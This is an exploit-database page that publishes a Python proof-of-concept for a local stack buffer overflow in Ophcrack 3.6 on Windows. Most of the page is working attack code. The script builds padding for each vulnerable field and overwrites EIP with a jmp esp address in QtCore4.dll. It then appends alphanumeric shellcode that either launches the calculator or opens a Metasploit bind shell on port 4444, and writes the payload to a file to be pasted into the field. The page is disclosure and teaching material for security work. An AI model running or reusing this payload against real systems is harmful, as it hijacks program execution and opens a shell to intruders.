Ophcrack 3.6 Local Buffer Overflow

2013.12.30
Credit: Osanda Malith
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # Title: Ophcrack 3.6 Local Stack Based Buffer Overflow # Version: 3.6 # Tested on: Windows XP SP2 en, Windows 8 64-bit # Vendor: http://ophcrack.sourceforge.net/ # Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe # Original Advisory: http://osandamalith.wordpress.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/ # E-Mail: osandajayathissa@gmail.com # Exploit-Author: Osanda Malith # Twitter: @OsandaMalith # /!\ Author is not responsible for any damage you cause # This POC is for educational purposes only # Video: https://www.youtube.com/watch?v=YPPIyxPMakI ''' This exploit is super lame, as no user is going to paste 1000 characters of text into the textbox, however it could potentially be used for privilege escalation. It was still a fun learning exercise. ''' ''' To exploit this bug open Ophcrack -> Click Load -> Remote SAM There are three fields "Host name:", "Share:", "User:" All three fields are vulnerable. I have made this exploit to work on those 3 fields. Copy the contents written to the file into the specific field you selected and click ok. ''' print ''' _/_/ _/ _/ _/ _/ _/_/_/ _/_/_/ _/_/_/ _/ _/_/ _/_/_/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/_/_/ _/ _/ _/_/_/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/ [+] Opchrack 3.6 Local Buffer Overflow Exploit [+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com > [~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com > ''' while True: try: choice = int(raw_input("[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n")) except ValueError: print "[!] Enter only a number" continue # If you select "Host name" you would get a error after injecting. Click "Don't send" and enjoy the payload if choice == 1: buff = "A" * 497 break elif choice == 2: buff = "A" * 504 break elif choice == 3: buff = "A" * 504 break else: print "[-] Invalid Choice" continue # jmp instruction must be 'ascii' due to character set restrictions # jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll) eip = "\x39\x5b\x2b\x6e" while True: try: choice = int(raw_input("[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n")) except ValueError: print "[!] Enter only a number" continue if choice == 1: #ALPHA3.py esp --input="shellcode.bin" shellcode = "TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g" shellcode += "0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D" shellcode += "3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z" shellcode += "3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14" shellcode += "3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L" shellcode += "2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n" break elif choice == 2: # Thanks to Matt for teaching me about choosing correct shellcode :-) # Modify this part with your own custom shellcode # msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP shellcode = ( "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30" "\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31" "\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b" "\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51" "\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c" "\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56" "\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b" "\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c" "\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51" "\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31" "\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74" "\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e" "\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30" "\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64" "\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61" "\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67" "\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70" "\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76" "\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a" "\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50" "\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f" "\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48" "\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34" "\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49" "\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30" "\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39" "\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48" "\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64" "\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37" "\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54" "\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38" "\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e" "\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f" "\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79" "\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52" "\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47" "\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30" "\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70" "\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66" "\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b" "\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68" "\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59" "\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d" "\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f" "\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33" "\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41" "\x41") print "[+] Connect on port 4444" break else: print "[-] Invalid Choice" continue junk = "A" * 100 # Glad to write this at 17 ;) # Combine strings exploit = buff + eip + shellcode + junk print "[+] Writing to file >> exploit.txt" # Write it out to file file = open("exploit.txt", "w") file.write(exploit) file.close() print "[~] " + str(len(exploit)) + " Bytes written to file" print "[+] Copy all the contents inside the file into the field you selected and click ok" #EOF

References:

http://osandamalith.wordpress.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top